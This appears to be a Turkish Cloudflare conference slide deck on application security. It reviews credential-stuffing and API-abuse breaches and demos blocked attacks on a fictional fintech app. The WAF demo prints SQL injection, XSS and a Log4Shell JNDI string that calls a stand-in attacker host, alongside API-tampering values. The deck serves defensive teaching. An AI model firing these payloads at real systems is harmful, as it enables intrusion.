Developed by Çağdaş Barak
Cloudflare
Immerse 2026

Cloudflare ile
Application Security

Application Security Live Demo

Çağdaş Barak
Senior Solutions Engineer
cagdas@cloudflare.com

Tehdidin Gerçek Boyutu

9.9B
Sızdırılan Şifre
Temmuz 2024'te ortaya çıkan RockYou2024, yaklaşık 10 milyar benzersiz düz metin şifreyi içeren tarihin en büyük şifre derlemesi (COMB) olarak siber güvenlik dünyasını sarstı. "ObamaCare" takma adlı bir saldırgan tarafından yayınlanan bu devasa dosya, 2021'deki 8,4 milyarlık listeye son yıllardaki binlerce yeni veri ihlalinden elde edilen 1,5 milyar yeni şifrenin eklenmesiyle oluşturulmuştur. Doğrudan tek bir sistemin hacklenmesinden ziyade, tüm dünyadaki eski ve yeni sızıntıların birleştirildiği bu koleksiyon, siber suçluların "credential stuffing" ve kaba kuvvet saldırılarında kullandıkları en tehlikeli hammadde haline gelmiştir.
↗ Bitdefender, 2024
560M+
Snowflake → 165 Şirket
2024 yılının en büyük uygulama güvenliği ihlali olarak kabul edilen Snowflake vakası; Ticketmaster, Santander ve AT&T gibi dev kurumları kapsayan 165'ten fazla kuruluşu doğrudan etkiledi. Mandiant tarafından UNC5537 olarak izlenen saldırganlar, platformun kendi altyapısındaki bir açıktan ziyade, müşterilerin Çok Faktörlü Kimlik Doğrulama (MFA) kullanmamasını ve infostealer zararlı yazılımlarıyla sızdırılan API kimlik bilgilerini (credential abuse) suistimal etti. Bu yöntemle gerçekleştirilen kitlesel veri hırsızlığı ve şantaj operasyonu, modern SaaS platformlarında sıkılaştırılmış kimlik yönetiminin ve sıfır güven (Zero Trust) prensiplerinin veri güvenliği için ne kadar vazgeçilmez olduğunu acı bir şekilde ortaya koydu.
↗ Mandiant, 2024
56.9M
Hot Topic — E-ticaret
Hot Topic, 2024 ve 2025 yılları arasında e-ticaret dünyasının en büyük uygulama güvenliği (AppSec) krizlerinden birini yaşadı. Toplamda 56,9 milyon kullanıcıyı etkileyen bu olayda, saldırganlar başka sızıntılardan elde edilen şifreleri kullanarak kitlesel bir credential stuffing saldırısı gerçekleştirdi. Bu yöntemle hesapları ele geçiren (account takeover) korsanlar; isim, e-posta, fiziksel adres ve kısmi kredi kartı verileri gibi kritik bilgileri sızdırdı. Bu vaka, şirketlerin sadece kendi sistemlerini korumasının yetmediğini, aynı zamanda kullanıcıların şifre tekrarı alışkanlıklarına ve bot saldırılarına karşı gelişmiş kimlik doğrulama önlemleri almasının hayati önemini bir kez daha kanıtladı.
↗ HIBP, 2024
38.3M
Canadian Tire — Retail
Ekim 2025'te gerçekleşen Canadian Tire veri ihlali, 38,3 milyon kullanıcıyı etkileyerek Kanada tarihinin en büyük perakende siber vakası olarak kayıtlara geçti. Doğrudan bir web uygulama ihlali sonucunda ortaya çıkan bu sızıntı; e-posta adresleri, hash'lenmiş şifreler ve kısmi kredi kartı bilgilerini içeren devasa bir veri kümesini kapsıyordu. Olay, perakende devlerinin web platformlarındaki güvenlik açıklarının ne denli büyük bir kitlesel riske yol açabileceğini gösterirken, sızan hash'li şifrelerin "credential stuffing" saldırıları için birer hammadde haline gelmesiyle tüm dijital ekosistemi tehdit eden bir boyuta ulaştır.
↗ HIBP, 2025
1.4M
Betterment — Fintech
Ocak 2026'da Fintech sektöründe "insan faktörü" ve "tedarik zinciri güvenliği" arasındaki kritik bağı gösteren bu vakada; saldırganlar, bir çalışanı sosyal mühendislik ile kandırarak kurumun iletişim altyapısını yöneten üçüncü taraf API sistemlerine sızmıştır. Bu yetkisiz erişim sonucunda 1,4 milyon kullanıcıya resmi kanallar üzerinden sahte kripto dolandırıcılığı mesajları iletilmiş ve geniş çaplı müşteri verisi sızdırılmıştır. Olayın en çarpıcı yönü, ana finansal sistemler sarsılmasa dahi, yan servis sağlayıcılar üzerindeki zayıf denetimin nasıl kitlesel bir phishing saldırısına ve ciddi bir itibar krizine dönüşebileceğini kanıtlamasıdır.
↗ TechCrunch, 2026
#1
En Büyük AppSec Tehdidi
2020 ve 2026 yılları arasında uygulama güvenliğinin (AppSec) bir numaralı tehdidi haline gelen Credential Stuffing, siber saldırganların elindeki en yıkıcı silahlardan birine dönüştü. Cloudflare raporlarına göre, sadece 2025 yılında 2 milyar aktif kimlik bilgisi çiftinin yeraltı forumlarında dolaşımda olması, geleneksel şifre tabanlı savunma mekanizmalarının artık tamamen yetersiz kaldığını göstermektedir. Çalıntı verilerin otomatik bot yazılımlarıyla kitlesel olarak test edildiği bu saldırı türü, statik güvenlik duvarlarını kolayca aşabildiği için şirketlerin davranışsal analiz ve gelişmiş bot koruma stratejilerine geçişini zorunlu kılmaktadır.
↗ Cloudflare Learning
01
Bölüm 01

Gerçek
İhlaller

Son 5 yılda uygulama güvenliğini atlatan saldırılar ve ağır sonuçları.

Credential Stuffing + API Abuse
Nisan – Eylül 2023 · HealthTech
23andMe
DNA verisi çalındı — 5 ay fark edilmedi
Saldırganlar başka ihlallerden çalınmış şifrelerle 14.000 hesaba girdi. Ardından "DNA Relatives" API özelliğini kötüye kullanarak bağlantılı 6.9 milyon kişinin ham genetik verisi, sağlık raporları ve etnik köken bilgisi scrape edildi.

5.1 milyon kullanıcının verisi dark web'de satışa çıktı. Şirket 2024'te iflas başvurusunda bulundu.
BleepingComputer, 2023
6.9M
Etkilenen kullanıcı
5 Ay
Tespit edilemedi
$30M+
Uzlaşma bedeli
İflas
2024 şirket akıbeti
CF ile önlenebilir miydi?
Bot Management — credential stuffing botları engellenir
Rate Limiting — login endpoint koruması
API Shield — anormal API erişim pattern'i tespiti
API Credential Abuse · MFA Yok
Nisan – Haziran 2024 · Multi-sector
Snowflake → 165 Şirket
Ticketmaster (560M), Santander (30M), AT&T (110M)
UNC5537 grubu, infostealer malware ile çalınmış Snowflake kimlik bilgilerini kullandı. Snowflake API'sinde MFA zorunlu değildi. Saldırganlar doğrudan API'ye bağlanarak 165 şirketin veritabanını çekti.

Tek bir platform açığı → yarım milyardan fazla insan etkilendi. Live Nation hisseleri çöktü, onlarca hukuki dava açıldı.
Mandiant / Google Threat Intelligence, 2024
560M+
Etkilenen kullanıcı
165
Etkilenen şirket
$500M+
Ticketmaster kayıpları
MFA?
API'de yoktu
CF ile önlenebilir miydi?
API Shield — endpoint'lere anormal erişim tespiti
Bot Management — credential replay engellenir
Sequence Mitigation — olağandışı API akışı tespiti
Credential Stuffing → Account Takeover → Finansal Zarar

Saldırganlar Hesabınıza Girdi — Finansal Zarar

DraftKings
Kasım 2022 · Sports Betting
68.000 hesaba credential stuffing ile girildi. Bakiyeler çekildi veya hesaplar dark web'de $50'a satıldı. Saldırganlardan biri 2026'da 30 ay hapis cezası aldı.
→ $300.000 doğrudan kullanıcı kaybı
PayPal
Aralık 2022 · Payment
34.942 hesap ele geçirildi. SSN, doğum tarihi, vergi kimlik numaraları görüntülendi. New York Eyaleti siber güvenlik uyumsuzluğu nedeniyle $2M ceza kesti.
→ $2 milyon regülatör cezası
Avustralya Emeklilik Fonları
Mart 2025 · 5 büyük fon
Tek hafta sonu koordineli saldırı. $365 milyar yöneten AustralianSuper dahil 20.000+ hesap etkilendi. Emeklilik birikimlerinden transfer yapıldı.
→ Emeklilik birikimi kaybı
02
Bölüm 02

Cloudflare
Application Security

Uygulama katmanını koruyan entegre güvenlik bileşenleri.

Cloudflare Mimarisi
Single Pass Architecture — Bir Geçişte Tam Koruma
Her istek tek geçişte tüm güvenlik katmanlarından geçer · <1ms ek gecikme
Cloudflare Connectivity Cloud
Tek kontrol düzlemi — API veya UI üzerinden yönetim
🌍
İnternet
DNS & Regülasyon
DNS
Data
Localization
Güvenlik Katmanı
DDoS
Protection
Bot
Management
WAF
API
Shield
Page
Shield
Firewall
for Apps
Performans ve Trafik Yönlendirme
CDN
Cache
Reserve
Waiting
Room
Load
Balancing
Argo
Routing
🖥️
Origin
Güvenlik Katmanı
DNS & Regülasyon
Performans ve Trafik Yönlendirme
⚡ Tek geçişte <1ms ek gecikme
Cloudflare Global Network
Dünyanın En Büyük
Connectivity Cloud'u
500 Tbps
Ağ Kapasitesi
215B
Blok/Gün
%20+
İnternet Trafiği
8+1
Türkiye DC
🌐
Anycast mimarisi ile saldırı kaynağına en yakın veri merkezinde engelleme. 330+ şehirde konumlandırılmış veri merkezleri. Origin sunucuya hiçbir zararlı trafik ulaşmaz.
🛡️
WAF
SQLi · XSS · RCE · OWASP
Managed Rules, OWASP Core Ruleset, Log4Shell. Günlük güncelleme.
🤖
Bot Management
ML · Heuristics · JA3/JA4 · H2/H3
7 detection motoru: ML, Heuristics, Anomaly, JSD, JA3/JA4, H2/H3, Browser Integrity.
⏱️
Advanced Rate Limiting
IP · ASN · JA3 · Cookie · Body
Sliding window. IP, ASN, JA3, cookie, header ve body'ye göre sayaç.
🔒
API Shield
Discovery · Schema · JWT · mTLS
API Discovery, Schema Validation, JWT, mTLS, Sequence Mitigation.
🌊
L7 DDoS
HTTP Flood · Slow Loris · SSL Amp.
Anycast ile dağıtılmış absorpsiyon. Sınırsız kapasite, otomatik hafifletme.
03
Bölüm 03

Live
Demo

CFPay — Kurgusal fintech platformuna gerçek saldırılar, gerçek bloklamalar.

CFPay Demo — Kayıt
↗ Tam ekran aç
Demo Senaryosu

CFPay'e
saldırıyoruz

Siz az önce CFPay'e kayıt oldunuz.
Email adresiniz sızdırılmış veri listelerinde yer alıyor.
Hesabınıza girmek için her yöntemi deniyor.
Use Case 01 · Demo
Bot Management
Saldırgan sistemi tarıyor. Hangi hesaplar var? API nasıl çalışıyor? Botlarla endpoint'leri tarıyor, hesap listesi çıkarmaya çalışıyor.
attack.py — Use Case 01 · Bot Management
✗ HTTP 403 Çağdaş Barak <cagdas@cloudflare.com>
✗ HTTP 403 Sistem keşfi — /api/users/search
29/29 engellendi · Bot Score: 1
Terminalde çalıştır
python3 attack.py 1
🧠 Detection Motorları
Heuristics — bilinen bot imzaları, anlık tespit
Machine Learning — request header, session ve browser sinyalleri
Anomaly Detection — domain baseline'ından sapma tespiti
JavaScript Detections — headless browser ve zararlı parmak izi
JA3 / JA4 — TLS el sıkışma parmak izi
H2 / H3 Ratio — HTTP protokol davranış analizi
Browser Integrity Check — gerçek tarayıcı doğrulaması
📊 Bot Score
Bot Score
Use Case 02 · Demo
Advanced Rate Limiting
RockYou2024'ten 9.9 milyar şifre. Saldırgan her hesaba farklı şifreler deniyor — dakikada yüzlerce deneme. Limit aşılınca 429.
attack.py — Use Case 02 · Rate Limiting
✗ HTTP 429 Çağdaş Barak — şifre: 123456
✗ HTTP 429 Çağdaş Barak — şifre: password
30/30 engellendi · 10 req/10s aşıldı
Terminalde çalıştır
python3 attack.py 2
⚡ Sayaç Karakteristikleri
IP Adresi — kaynak IP başına sayaç
ASN — otonom sistem numarası
JA3 Parmak İzi — TLS istemci imzası
Cookie Değeri — oturum bazlı sayaç
Header Değeri — özel header'a göre
Request Body — içerik eşleşmesine göre
Custom Counting Expression — HTTP response code'a göre sayaç (ör. 401, 403)
🎯 Aksiyon Seçenekleri
Block — isteği reddet
Challenge — Managed, Interactive veya Non-Interactive doğrulama
Log — sadece kaydet, izle
Use Case 03 · Demo
WAF — Web Application Firewall
Şifreyle giremeyen saldırgan login formunun kendisini kırıyor. SQLi, RCE ve XSS saldırıları.
attack.py — Use Case 03 · WAF
✗ HTTP 403 UNION SELECT null,null,null--
✗ HTTP 403 ${jndi:ldap://attacker.com/a}
✗ HTTP 403 <svg onload=alert(1)>
15/15 engellendi · SQLi + RCE + XSS
Terminalde çalıştır
python3 attack.py 3
🛡️ Kural Setleri
Cloudflare Managed Rules — her gün güncellenen, küresel tehdit istihbaratıyla beslenen kural tabanı
OWASP Core Ruleset — OWASP Top 10 saldırı sınıflarına karşı kapsamlı koruma
Exposed Credentials Check — HaveIBeenPwned ve benzeri veritabanları ile sızdırılmış kimlik bilgisi tespiti
Custom Rules — iş mantığına özel kurallar
🎯 Saldırı Tipleri
SQLi, XSS, RCE, Log4Shell, Path Traversal, XXE, SSRF, SSTI, Command Injection, File Inclusion
📊 WAF Attack Score
WAF Attack Score
Use Case 04 · Demo
API Shield — Schema Validation
Direkt saldıramıyor. API'ye beklenmedik, bozuk istekler gönderiyor. Negatif tutar, geçersiz IBAN, bilinmeyen alanlar, şema ihlali.
attack.py — Use Case 04 · API Shield
✗ HTTP 403 amount: -9999 (negatif tutar)
✗ HTTP 403 from_iban: HACKER-ACCOUNT
✗ HTTP 403 admin:true enjeksiyonu
8/8 engellendi · Schema Validation
Terminalde çalıştır
python3 attack.py 4
🔍 API Discovery & Endpoint Management
Trafik analizi ile tüm API endpoint'lerini otomatik keşfeder. Shadow API'leri, belgesiz endpoint'leri ve riskli yolları tespit eder.
📋 Schema Validation
OpenAPI (Swagger) şemasına göre her isteği validate eder. Tip uyuşmazlığı, eksik alan, bilinmeyen parametre veya değer aralığı ihlali anında bloklanır.
🔐 JWT Validation · mTLS
JWT Token Validation — imza doğrulama, claim kontrolü, token expiry
mTLS — karşılıklı sertifika doğrulama ile yalnızca yetkili istemciler
Use Case 05 · Demo
API Shield — Sequence Mitigation
Son hamle. Login olmadan direkt ₺50.000 transfer. Meşru kullanıcı tam sırayla geçer, saldırgan bloklanır.
attack.py — Use Case 05 · Sequence Mitigation
[ TEST A ] Meşru kullanıcı — tam sıra
✓ HTTP 200 Login → Verify → Transfer ₺250
[ TEST B ] Saldırgan — adım atlıyor
✗ HTTP 403 Direkt ₺50.000 transfer girişimi
₺50.000 transfer engellendi · 2/2 blok
Terminalde çalıştır
python3 attack.py 5
🔗 Nasıl Çalışır?
Cloudflare, session identifier (Authorization header) kullanarak her oturum için API endpoint erişim sırasını takip eder. Tanımlanan zorunlu sıra ihlal edilirse istek anında bloklanır. Origin sunucuya ulaşmaz.
🎯 Koruduğu Saldırılar
BOLA (Broken Object Level Auth) — nesne seviyesi yetki ihlali
BFLA (Broken Function Level Auth) — fonksiyon seviyesi yetki ihlali
İş Mantığı İhlali — onaysız işlem, adım atlama
Direkt Endpoint Erişimi — oturum olmadan kritik API çağrısı
📊 Sequence Analytics
CF gerçek kullanıcı davranış örüntülerini öğrenir. Correlation score ile sıra önemini belirler. Düşük false positive oranı ile güvenli üretim ortamı.